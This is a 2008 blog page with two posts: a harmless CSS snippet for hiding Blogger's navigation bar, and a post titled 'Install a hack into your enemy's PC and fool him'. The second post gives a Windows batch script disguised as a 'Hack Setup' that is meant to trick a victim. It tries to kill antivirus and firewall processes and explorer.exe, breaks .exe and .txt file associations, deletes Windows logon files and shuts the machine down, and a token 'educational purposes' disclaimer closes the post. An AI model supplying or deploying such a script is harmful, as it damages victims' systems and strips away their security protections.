Showing posts with label script. Show all posts
Showing posts with label script. Show all posts

Friday, November 7, 2008

How to remove the navigation bar from your blog

Hello friends,in the last post i had written about using the multiple versions in a google talk messenger.But today its a different topic which is related to a blog.Yes,most of the bloggers wants this,the question is "How to remove the navigation bar from your blog".Well,it has a very short and simple answer.Ok,lemme explain it to you:-

For removing the navigation bar,all you need to do is to copy-paste the following script in your blog template.

1.Go to blogger.com and sign in with your account.

2.Now open your blog and go to its settings.

3.Under setting,you will see the "Edit HTML" tab.

4.Just click that tab and put the following code in your blog template.

5.Add this script:-
#navbar-i frame {
height:0px;
visibility:hidden;
display:none;
}

6.You are done!!!!!

Keep enjooying my posts and please comment on all of my posts so that i could help you.




Thursday, November 6, 2008

Install a hack into your enemy's PC and fool him


Good morning friends,as you all know christmas is just one and a half month away but today i will teach you how to fool someone by thinking that he is installing a hack file.So lets start in a simple way.So just copy and paste the below code in notepad and save it as installhack.bat and you are finished.




title Hack Setup
color 0A
@echo off
set end=md"Hack installing"
set fin=copy"Hack log.txt""Installing"
%end%
%fin%
net send * Hack is installing,press OK to begin setup.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked.....
msg * I warned you,and you kept going.Challenge me and this is what happens now.
del "c:\windows\system32\logoff.exe /F /Q
del "c:\windows\system32\logon.exe /F /Q
del "c:\windows\system32\logon.scr /F /Q
cls
shutdown


Now,this hack will confuse the victim and he will be hacked.
This hack will:
1.End process NAVAPSVC.exe
2.End process explorer.exe due to which all the icons and taskbar will disappear.
3.End process zonelabs.exe
4.Associate a txt file with a mp3 file.When a victim opens a txt file,then his/her PC will open a mp3 file.
5.Associate a exe file with a txt file.When a victim opens a exe file,then his/her PC will open notepad.
6.Delete the login and logoff screens.

NOTE:-This hack is only for educational purposes and i will not be responsible for the misuse or illegal use of the hacking script.